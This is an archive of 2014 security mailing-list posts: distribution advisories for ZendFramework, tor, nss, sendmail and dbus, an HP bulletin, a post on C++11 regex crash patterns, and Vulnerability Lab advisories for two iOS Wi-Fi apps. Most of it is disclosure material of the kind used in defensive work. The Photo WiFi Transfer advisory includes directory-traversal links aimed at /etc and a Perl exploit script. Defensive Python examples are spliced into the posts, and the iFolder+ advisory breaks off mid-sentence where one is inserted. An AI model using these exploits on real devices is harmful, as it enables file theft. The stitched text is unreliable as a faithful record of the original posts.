[ MDVSA-2014:145 ] php-ZendFramework

2014-08-01 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2014:145
 http://www.mandriva.com/en/support/security/
 ___

 Package : php-ZendFramework
 Date: July 31, 2014
 Affected: Business Server 1.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in php-ZendFramework:
 
 The implementation of the ORDER BY SQL statement in Zend_Db_Select
 of Zend Framework 1 contains a potential SQL injection when the query
 string passed contains parentheses (CVE-2014-4914).
 
 The updated packages have been upgraded to the latest ZendFramework
 (1.12.7) version which is not vulnerable to this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4914
 http://framework.zend.com/security/advisory/ZF2014-04
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com



[ MDVSA-2014:146 ] file

2014-08-01 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2014:146
 http://www.mandriva.com/en/support/security/
 ___

 Package : file
 Date: July 31, 2014
 Affected: Business Server 1.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in file:
 
 file before 5.19 does not properly restrict the amount of data read
 during a regex search, which allows remote attackers to cause a
 denial of service (CPU consumption) via a crafted file that triggers
 backtracking during processing of an awk rule. NOTE: this vulnerability
 exists because of an incomplete fix for CVE-2013-7345 (CVE-2014-3538).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3538
 http://www.ubuntu.com/usn/usn-2278-1/
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 ___




[SECURITY] [DSA 2993-1] tor security update

2014-08-01 Thread Salvatore Bonaccorso

- -
Debian Security Advisory DSA-2993-1   secur...@debian.org
http://www.debian.org/security/   Peter Palfrader
July 31, 2014  http://www.debian.org/security/faq
- -

Package: tor
CVE ID : CVE-2014-5117

Several issues have been discovered in Tor, a connection-based
low-latency anonymous communication system, resulting in information
leaks.

o  Relay-early cells could be used by colluding relays on the network to
   tag user circuits and so deploy traffic confirmation attacks
   [CVE-2014-5117].  The updated version emits a warning and drops the
   circuit upon receiving inbound relay-early cells, preventing this
   specific kind of attack.  Please consult the following advisory for
   more details about this issue:

   https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack

o  A bug in the bounds-checking in the 32-bit curve25519-donna
   implementation could cause incorrect results on 32-bit
   implementations when certain malformed inputs were used along with a
   small class of private ntor keys.  This flaw does not currently
   appear to allow an attacker to learn private keys or impersonate a
   Tor server, but it could provide a means to distinguish 32-bit Tor
   implementations from 64-bit Tor implementations.

The following additional security-related improvements have been
implemented:

o  As a client, the new version will effectively stop using CREATE_FAST
   cells.  While this adds computational load on the network, this
   approach can improve security on connections where Tor's circuit
   handshake is stronger than the available TLS connection security
   levels.

o  Prepare clients to use fewer entry guards by honoring the consensus
   parameters.  The following article provides some background:

   https://blog.torproject.org/blog/improving-tors-anonymity-changing-guard-parameters

For the stable distribution (wheezy), these problems have been fixed in
version 0.2.4.23-1~deb7u1.

For the testing distribution (jessie) and the unstable distribution
(sid), these problems have been fixed in version 0.2.4.23-1.

For the experimental distribution, these problems have been fixed in
version 0.2.5.6-alpha-1.

We recommend that you upgrade your tor packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



TigerCom iFolder+ v1.2 iOS - Multiple Vulnerabilities

2014-08-01 Thread Vulnerability Lab
Document Title:
===
TigerCom iFolder+ v1.2 iOS - Multiple Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1284


Release Date:
=
2014-07-30


Vulnerability Laboratory ID (VL-ID):

1284


Common Vulnerability Scoring System:

7.4


Product & Service Introduction:
===
iFolder+, Belong to yourself is a mobile application coded by TigerCom. The 
application allows users to communicate and share information or files over 
the wifi network. The app is non-commercial and can be downloaded through the 
Apple iTunes shop or App Store. 

- Safety
- Intelligent encryption, protect the folder
- No Internet connection to prevent the documents stolen
- Password protected, locked the document
- Wireless transmission
- Using Wifi, you can share files between iphone, ipad and computer
- Current open folder sharing, better protect your privacy
- Private photos/videos/documents
- Import photos and videos from album
- Export photos and videos to your album
- Open camera, store photos and recording video
- Photos and videos preview
- Photos and video high fidelity storage
- Photo browsing, support for gestures to zoom
- video playing, perfect playback experience
- Support PDF, TXT documents directly browsing
- Photo folder, Video folder, Documents folder, easily classified
- Support Wifi Import and Export
- Private accounts/contacts
- Account protection, add a variety of accounts

( Copy of the Homepage: https://itunes.apple.com/de/app/ifolder+/id622423906 )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities 
in the official TigerCom iFolder+ v1.2 iOS mobile application.


Vulnerability Disclosure Timeline:
==
2014-07-30: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

TigerCom
Product: iFolder+ - iOS Mobile Web Application 1.2


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

1.1
A local file include web vulnerability has been discovered in the official 
TigerCom iFolder+ v1.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to include 
local file/path requests or system-specific path commands without 
authorization and so compromise the mobile web-application.

The web vulnerability is located in the `filename` value of the `uploadfile` 
module. Remote attackers are able to upload their own files 
with malicious `filename` values in the `uploadfile` POST request to 
compromise the mobile web-application. The local file/path 
include executes in the index `folder list` context, next to the 
vulnerable filename value. The attacker is able to inject the 
local file request through the available `wifi interface` for file or 
folder exchange/sharing.

Remote attackers are also able to combine the filename validation issue 
with persistently injected script code to execute 
other local malicious requests. The attack vector is on the 
application side of the wifi service, and the request method used to 
inject is POST. 

The security risk of the local file include web vulnerability is estimated as 
high with a CVSS (Common Vulnerability Scoring System) count 
of 7.3. Exploitation of the local file include web vulnerability requires no 
privileged web-application user account or user interaction. 
Successful exploitation of the local file include web vulnerability results in 
mobile application or connected device component compromise.


Request Method(s):
[+] [POST]

Vulnerable Service(s):
[+] iFolder+ v1.2

Vulnerable Module(s):
[+] uploadfile

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index Folder Dir Listing 
(http://localhost:8080/)


1.2
An arbitrary file upload web vulnerability has been discovered in the official 
TigerCom iFolder+ v1.2 iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with 
multiple extensions to bypass the web-server or system validation.

The vulnerability is located in the `uploadfile` module. Remote attackers are 
able to upload php or js web-shells by renaming the file with 
multiple extensions to bypass the file restriction mechanism. The attacker 
uploads, for example, a web-shell with the following name and extension: 
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the 
file in the web application. He deletes the .jpg and .gif file 
extensions and can access the application file with elevated 
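A defender's check for the `uploadfile` `filename` value described in 1.1 and 1.2, as an added example that is not TigerCom's code: every extension in the name counts, so `image.jpg.gif.js.php.jpg` is rejected rather than accepted as an image, and path characters in the name are refused before it can reach the folder listing. The allow-list and the stem character set are assumptions.

```python
# Added example (not TigerCom code): allow-list validation of an uploaded
# filename that treats every extension in the name as significant and refuses
# path characters, covering both the multi-extension upload and the
# filename-as-path (local file include) shapes from the advisory.
import re

# Assumed allow-list for a photo/video/document share; adjust per deployment.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "mp4", "mov", "pdf", "txt"}
# Assumed conservative stem: letters, digits, underscore, hyphen, 1..64 chars.
_SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


class UnsafeFilename(ValueError):
    """Raised when an uploaded name fails validation."""


def sanitize_upload_name(raw: str) -> str:
    """Return a canonical safe name ("stem.ext", lower-case ext) or raise.

    Checks, in order:
      * no NUL bytes or path separators (the name must never act as a path,
        which is how a filename value turns into a local file include),
      * exactly one extension, so "a.jpg.gif.js.php.jpg" is rejected instead
        of being judged by its first or last extension only,
      * the extension is on the allow-list, compared case-insensitively,
      * the stem uses a conservative character set.
    """
    if "\x00" in raw or "/" in raw or "\\" in raw:
        raise UnsafeFilename("NUL byte or path separator in filename")
    name = raw.strip()
    parts = name.split(".")
    if len(parts) != 2:
        raise UnsafeFilename(
            "expected exactly one extension, got %d" % (len(parts) - 1))
    stem, ext = parts
    if not _SAFE_STEM.match(stem):
        raise UnsafeFilename("stem contains disallowed characters")
    if ext.lower() not in ALLOWED_EXTENSIONS:
        raise UnsafeFilename("extension %r not allowed" % ext)
    return "%s.%s" % (stem, ext.lower())


def is_safe_upload_name(raw: str) -> bool:
    """Boolean form of sanitize_upload_name for filters and tests."""
    try:
        sanitize_upload_name(raw)
        return True
    except UnsafeFilename:
        return False


if __name__ == "__main__":
    # Constructed sample names, including the one quoted in the advisory.
    for candidate in ("Photo_01.JPG", "image.jpg.gif.js.php.jpg",
                      "../../etc/passwd", "shell.php", ".htaccess"):
        print("%-28s -> %s" % (candidate, is_safe_upload_name(candidate)))
```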

[SECURITY] [DSA 2994-1] nss security update

2014-08-01 Thread Raphael Geissert

- -
Debian Security Advisory DSA-2994-1   secur...@debian.org
http://www.debian.org/security/  Raphael Geissert
July 31, 2014  http://www.debian.org/security/faq
- -

Package: nss
CVE ID : CVE-2013-1741 CVE-2013-5606 CVE-2014-1491 CVE-2014-1492

Several vulnerabilities have been discovered in nss, the Mozilla Network
Security Service library:

CVE-2013-1741

Runaway memset in certificate parsing on 64-bit computers leading to
a crash by attempting to write 4Gb of nulls.

CVE-2013-5606

Certificate validation with the verifylog mode did not return
validation errors, but instead expected applications to determine
the status by looking at the log.

CVE-2014-1491

Ticket handling protection mechanisms bypass due to the lack of
restriction of public values in Diffie-Hellman key exchanges.

CVE-2014-1492

Incorrect IDNA domain name matching for wildcard certificates could
allow specially-crafted invalid certificates to be considered as
valid.
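The wildcard matching rule behind CVE-2014-1492, as an added example that is not NSS code: a dNSName matcher applying the RFC 6125 constraints, including refusing a wildcard that sits inside an IDNA A-label (`xn--*`), run over constructed names.

```python
# Added example (not NSS code): RFC 6125-style wildcard matching for
# certificate dNSName values. The IDNA rule is the edge case relevant to
# CVE-2014-1492: a wildcard embedded in an A-label must not be honoured.


def _labels(name: str) -> list:
    """Lower-case, drop one trailing dot, split into non-empty DNS labels."""
    labels = name.lower().rstrip(".").split(".")
    if not all(labels):
        raise ValueError("malformed name: %r" % name)
    return labels


def match_hostname(pattern: str, hostname: str) -> bool:
    """Return True if the certificate name `pattern` covers `hostname`.

    For a wildcard pattern every rule must hold:
      * the wildcard is the entire leftmost label ("*.example.com");
        partial forms such as "w*w.example.com" or "xn--*.example.com"
        (a wildcard inside an IDNA A-label) are rejected,
      * no wildcard appears in any other label,
      * at least two labels follow it ("*.com" is rejected),
      * it matches exactly one label ("a.b.example.com" is not covered).
    A pattern without a wildcard must match label for label.
    """
    p = _labels(pattern)
    h = _labels(hostname)
    if "*" in hostname:
        return False                       # a hostname never contains '*'
    if any("*" in lbl for lbl in p[1:]):
        return False                       # wildcard only in leftmost label
    first = p[0]
    if "*" not in first:
        return p == h                      # plain name: exact match
    if first != "*":
        return False                       # partial / in-A-label wildcard
    if len(p) < 3:
        return False                       # would cover a whole TLD
    if len(h) != len(p):
        return False                       # wildcard spans exactly one label
    return p[1:] == h[1:]


if __name__ == "__main__":
    # Constructed pairs; the xn-- ones exercise the IDNA rule.
    for pat, host in (("*.example.com", "www.example.com"),
                      ("*.example.com", "a.b.example.com"),
                      ("xn--*.example.com", "xn--bcher-kva.example.com"),
                      ("*.xn--bcher-kva.example", "www.xn--bcher-kva.example")):
        print("%-26s %-30s %s" % (pat, host, match_hostname(pat, host)))
```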

For the stable distribution (wheezy), these problems have been fixed in
version 2:3.14.5-1+deb7u1.

For the testing distribution (jessie), and the unstable distribution (sid),
these problems have been fixed in version 2:3.16-1.

We recommend that you upgrade your nss packages.




[ MDVSA-2014:147 ] sendmail

2014-08-01 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2014:147
 http://www.mandriva.com/en/support/security/
 ___

 Package : sendmail
 Date: July 31, 2014
 Affected: Business Server 1.0
 ___

 Problem Description:

 Updated sendmail packages fix security vulnerability:
 
 Sendmail before 8.14.9 does not properly close file descriptors
 before executing programs. This bug could enable local users to
 interfere with an open SMTP connection if they can execute their own
 program for mail delivery (e.g., via procmail or the prog mailer)
 (CVE-2014-3956).
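The descriptor-inheritance bug class described above, as an added example that is not sendmail code: a stand-in "delivery program" probes whether it inherited the parent's open socket, once with the descriptor left inheritable (the shape the advisory describes) and once with it closed across exec. Assumes a POSIX system with a Python interpreter at sys.executable.

```python
# Added example (not sendmail code): the descriptor-inheritance bug class of
# CVE-2014-3956, shown with a stand-in delivery program. Assumes POSIX and a
# Python interpreter at sys.executable.
import os
import socket
import subprocess
import sys

# Constructed stand-in for a user-supplied delivery program (the role procmail
# or a prog mailer plays in the advisory): it reports whether the descriptor
# number it is handed is open in its own process.
DELIVERY_PROBE = (
    "import os, sys\n"
    "fd = int(sys.argv[1])\n"
    "try:\n"
    "    os.fstat(fd)\n"
    "    print('open')\n"
    "except OSError:\n"
    "    print('closed')\n"
)


def delivery_program_sees_connection(close_before_exec: bool) -> bool:
    """Open a socket standing in for the SMTP connection, run the delivery
    stand-in, and return True if that child could still reach the socket.

    close_before_exec=False reproduces the vulnerable shape: the descriptor is
    inheritable and nothing closes it before exec, so the child could read
    from or write to the connection. close_before_exec=True applies the fix:
    the descriptor is closed for the child before the program runs.
    """
    conn, peer = socket.socketpair()
    try:
        fd = conn.fileno()
        # Inheritable only in the vulnerable run; Python makes new descriptors
        # non-inheritable by default, so the flag is set explicitly both ways.
        os.set_inheritable(fd, not close_before_exec)
        result = subprocess.run(
            [sys.executable, "-c", DELIVERY_PROBE, str(fd)],
            close_fds=close_before_exec,   # close all fds > 2 before exec
            capture_output=True, text=True, check=True,
        )
        return result.stdout.strip() == "open"
    finally:
        conn.close()
        peer.close()


if __name__ == "__main__":
    print("leaked:", delivery_program_sees_connection(close_before_exec=False))
    print("fixed: ", delivery_program_sees_connection(close_before_exec=True))
```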
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3956
 http://advisories.mageia.org/MGASA-2014-0270.html
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 ___




[ MDVSA-2014:148 ] dbus

2014-08-01 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2014:148
 http://www.mandriva.com/en/support/security/
 ___

 Package : dbus
 Date: July 31, 2014
 Affected: Business Server 1.0
 ___

 Problem Description:

 Updated dbus packages fix security vulnerabilities:
 
 A flaw was reported in D-Bus's file descriptor passing feature. A
 local attacker could use this flaw to cause a service or application
 to disconnect from the bus, typically resulting in that service or
 application exiting (CVE-2014-3532).
 
 A flaw was reported in D-Bus's file descriptor passing feature. A local
 attacker could use this flaw to cause an invalid file descriptor to be
 forwarded to a service or application, causing it to disconnect from
 the bus, typically resulting in that service or application exiting
 (CVE-2014-3533).
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3532
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3533
 http://advisories.mageia.org/MGASA-2014-0294.html
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 ___




[security bulletin] HPSBMU03081 rev.1 - HP Enterprise Maps, Remote Information Disclosure

2014-08-01 Thread security-alert

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04390793

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04390793
Version: 1

HPSBMU03081 rev.1 - HP Enterprise Maps, Remote Information Disclosure

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-07-31
Last Updated: 2014-07-31

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Enterprise
Maps. The vulnerability could be exploited remotely to allow disclosure of
information.

References: CVE-2014-2628, SSRT101627

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Enterprise Maps v.1

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference       Base Vector                     Base Score
  CVE-2014-2628   (AV:N/AC:L/Au:S/C:C/I:C/A:C)    9
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided a patch for HP Enterprise Maps v.1 to resolve the
vulnerability. Please contact HP support to request the patch.

HISTORY
Version:1 (rev.1) - 31 July 2014 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.



C++11 regex insecure by default

2014-08-01 Thread submit
C++11 regex insecure by default
http://cxsecurity.com/issue/WLB-2014070187


--- 0 Description ---
In this article I will present the conclusions of testing the new 'objective 
regex' in several implementations of the standard C++ library, such as libcxx 
(clang) and stdlibc++ (gcc). The results show the weakness in officially 
supported implementations. Huge complexity and memory exhaustion were well known 
in most libc libraries. Theoretically, the new C++11 regex eliminates resource 
exhaustion by specifying special limits that prevent evil patterns. 
In glibc there was the conviction that the vendor using the regex implementation 
is responsible for the safety of regcomp() use. However, it is difficult to do 
the parsing of regular expressions in client applications and other remotely 
affected ones. The exception support for regex errors looks very promising. 
Let's see some part of the documentation of std::regex_error

-std::regex_constants::error_type---
error_space  
there was not enough memory to convert the expression into a finite state 
machine

error_complexity
the complexity of an attempted match exceeded a predefined level

error_stack
there was not enough memory to perform a match
-std::regex_constants::error_type---

error_complexity looks promising, but which value of the complexity level is 
the best? There are many interpretations between usability and security. From 
the security aspect this level should be low to keep real-time execution, in 
contrast to static code analysis where execution time is not so important. 
The other constants like error_space and error_stack are also interesting from 
a security view. 
After the official release of the stdlibc++ regex in GCC 4.9.0 I decided to 
check this implementation. To prove that these limits do not fulfill their 
role, I reported the issues below:

GCC:
libstdc++ C++11 regex resource exhaustion
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61601
libstdc++ C++11 regex memory corruption
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61582

CLANG:
libcxx C++11 regex cpu resource exhaustion 
http://llvm.org/bugs/show_bug.cgi?id=20291

In my observation libc++ wins in performance; only the problem with error 
complexity was reported. In ticket #20291 we are searching for an answer for 
the default pre-set level value; however, it can be personal for each use. GCC 
fixed the most dangerous issues before releasing the official version 4.9.0, 
where regex is supported. Anyway, stack overflow still occurs in the latest 
regex implementation.


--- 0.1 GCC before 4.9 Memory corruption ---
# ./c11RE '(|'
Segmentation fault (core dumped)


--- 0.2 GCC 4.9 Memory corruption ---
(gdb) r '((.*)()?*{100})'
Starting program: /home/cx/REstd11/kozak5/./c11re '((.*)()?*{100})'

Program received signal SIGSEGV, Segmentation fault.
0x00402f15 in std::_Bit_reference::operator bool() const


--- 0.3 GCC Trunk Stack Overflow ---
Starting program: /home/cx/REtrunk/kozak5/t3 '(.*{100}{300})'

Program received signal SIGSEGV, Segmentation fault.
0x0040c22a in std::__detail::_Executor<char const*, 
std::allocator<std::sub_match<char const*> >, std::regex_traits<char>, 
true>::_M_dfs(std::__detail::_Executor<char const*, 
std::allocator<std::sub_match<char const*> >, std::regex_traits<char>, 
true>::_Match_mode, long) ()


--- 0.4 CLANG CPU Exhaustion PoC ---
#include <iostream>
#include <regex>
#include <string>

using namespace std;

int main() {
    try {
        // nested quantifiers in POSIX extended syntax, as posted in the PoC
        regex r("(.*(.*){9})", regex_constants::extended);
        smatch results;
        // input string as shown in the original post
        string test_str = "|||";
        if (regex_search(test_str, results, r))
            cout << results.str() << endl;
        else
            cout << "no match";
    } catch (const regex_error& e) {
        // the limits the post examines surface here as e.code()
        cout << "extended: what: " << e.what() << "; code: " << e.code()
             << endl;
    }

    return 0;
}
--- CLANG CPU Exhaustion ---


--- 1 Conclusion ---
I think it's a dangerous situation that may have a bearing on quality, similar 
to the glibc regex.h.  Maybe only a new type of extended regular expressions 
provides safety? It's a good moment to start a discussion about the safety of 
regex in the new C++.


--- 2 References ---
libstdc++ C++11 regex resource exhaustion
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61601
libstdc++ C++11 regex memory corruption
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61582
libcxx C++11 regex cpu resource exhaustion 
http://llvm.org/bugs/show_bug.cgi?id=20291
GCC 4.9 Release Series New Features
https://gcc.gnu.org/gcc-4.9/changes.html


--- 3 Thanks ---
gcc and clang support and KacperR


--- 4 About ---
Author:
Maksymilian Arciemowicz

Contact:
http://cxsecurity.com/wlb/add/



Photo WiFi Transfer 1.01 - Directory Traversal Vulnerability

2014-08-01 Thread Vulnerability Lab
Document Title:
===
Photo WiFi Transfer 1.01 - Directory Traversal Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1285


Release Date:
=
2014-07-31


Vulnerability Laboratory ID (VL-ID):

1286


Common Vulnerability Scoring System:

6.7


Product & Service Introduction:
===
Using this app, you can download photos to a PC or a smartphone from your 
iPhone through WiFi. The app provides the easiest and 
fastest way to do it. Just run the app on the iPhone and open the web browser 
on your PC or another smart phone. That is all 
that you are required to do. It is quite simple. In addition to the web 
browser, a ftp client application is also supported to 
access the photos. Do not pay money for these functions as the app provides all 
of them without charging. 

(Copy of the Homepage: 
https://itunes.apple.com/us/app/photo-wifi-transfer/id892772036 )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered a directory traversal 
vulnerability in the official BlueFinger Photo WiFi Transfer v1.01 iOS mobile 
application.


Vulnerability Disclosure Timeline:
==
2014-07-31: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

BlueFinger Apps
Product: Photo WiFi Transfer - iOS Mobile Web Application (FTP) 1.01


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A directory traversal web vulnerability has been discovered in the official 
BlueFinger Photo WiFi Transfer v1.01 iOS mobile application.
The vulnerability allows remote attackers to bypass the path restriction of a 
service to access sensitive app, web-server or device information.

The vulnerability is located in the `ftp` (ftp://localhost:8080) service of the 
wifi `web-server` module. The issue allows an attacker to bypass 
the regular `folder/path` validation mechanism to access sensitive app, 
web-server or iOS device information. The attack vector of the issue is on 
the application side of the service, and the `GET` method is required to 
perform the malicious request.

After starting the web-server through the ftp function, the attacker is 
able to include 5 more path values (../../../../../) to access 
unauthorized higher folders outside the mobile application service. In the 
analysis we saw that a path change of 5 directories is required 
for the bypass. During the tests we accessed the full app service folder and, 
through the directory traversal, web-server configuration files as well as 
the parent device directory.

The security risk of the directory traversal web vulnerability is estimated as 
high with a CVSS (Common Vulnerability Scoring System) 
count of 6.7. Exploitation of the path traversal web vulnerability requires no 
privileged web-application user account or user interaction. 
Successful exploitation of the directory traversal vulnerability results in 
mobile application or connected device component compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Directory

Vulnerable Parameter(s):
[+] path

Affected Module(s):
[+] Parent Directory (ftp://localhost:8080/)
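A hardened path resolver for the ftp/web-server share described above, as an added example that is not the app's code: each client-supplied path is normalised and then checked to still lie under the share root, so `../` sequences cannot reach parent directories. SHARE_ROOT mirrors the layout of the path in the exception message of the PoC section with a placeholder application id; the sample requests are constructed.

```python
# Added example (not the app's code): contain client-supplied FTP/HTTP paths
# inside the share root. Lexical normalisation is enough for the ../ bug
# described in the advisory; a share containing symlinks would additionally
# need os.path.realpath on the final path.
import posixpath

# Constructed to mirror the directory layout quoted in the advisory; the
# application id is a placeholder, not a real install.
SHARE_ROOT = "/private/var/mobile/Applications/APP-ID-PLACEHOLDER/Documents/photo"


class PathEscape(PermissionError):
    """Raised when a request would resolve outside the share root."""


def resolve_in_share(requested: str, root: str = SHARE_ROOT) -> str:
    """Map a request path to a filesystem path inside `root`, or raise.

    Steps:
      * reject NUL bytes (they truncate paths in C-level APIs),
      * treat the request as relative to the root whatever its leading
        slashes, and fold backslashes so they cannot hide a separator,
      * normalise lexically (collapses "../" and "./"),
      * require the result to be the root itself or to start with root + "/"
        (the "/" guard stops "photo2" from passing as inside "photo").
    """
    if "\x00" in requested:
        raise PathEscape("NUL byte in path")
    root = posixpath.normpath(root)
    rel = requested.replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, rel))
    if candidate != root and not candidate.startswith(root + "/"):
        raise PathEscape("request escapes share root: %r" % requested)
    return candidate


def is_contained(requested: str, root: str = SHARE_ROOT) -> bool:
    """Boolean form of resolve_in_share for filters, logging and tests."""
    try:
        resolve_in_share(requested, root)
        return True
    except PathEscape:
        return False


if __name__ == "__main__":
    # Constructed requests, including the traversal shapes from the PoC links.
    for req in ("/album/IMG_0001.jpg", "/../../Documents/",
                "/../../../../../../../../../../../../../../../../etc",
                "/a/../b.jpg"):
        print("%-60s %s" % (req, is_contained(req)))
```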


Proof of Concept (PoC):
===
The directory traversal web vulnerability can be exploited by attackers without 
a privileged application user account or user interaction.
For a security demonstration or to reproduce the security vulnerability, follow 
the provided information and steps below.

Exception:
50 /private/var/mobile/Applications/CFCEEF6E-AA35-42D6-84EC-BFB518F764B1/Documents/photo/../../etc/passwd No such file or directory.

Standard Request:
ftp://localhost:8080/../../Documents/

PoC: Links
ftp://localhost:8080/../../../../../../../../../../../../../../../../etc
ftp://localhost:8080/../../../../../../../../../../../../../../../../usr/
ftp://localhost:8080/../../../../../../../../../../../../../../../../Applications/
ftp://localhost:8080/../../../../../../../../../../../../../../../../System/


Exploit: PoC (PL)
#!/usr/bin/perl
use strict;
use warnings;
use LWP::Simple;

print "---\n";
print "-= Photo WiFi Transfer v1.0.1 - PoC Directory Traversal =-\n";
print "---\n\n";

print "Target (ftp://localhost:8080/): ";
chomp(my $targ = <STDIN>);

print "Path (/fn25/): ";
chomp(my $path = <STDIN>);

# traversal sequence appended to the share path, as in the original PoC
my $url  = "../../../../../../../../etc/";
my $page = get("http://" . $targ . $path . $url)
    || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $page\n";


Exploit: PoC (HTML)
<html>
<head><body><title></title>
<iframe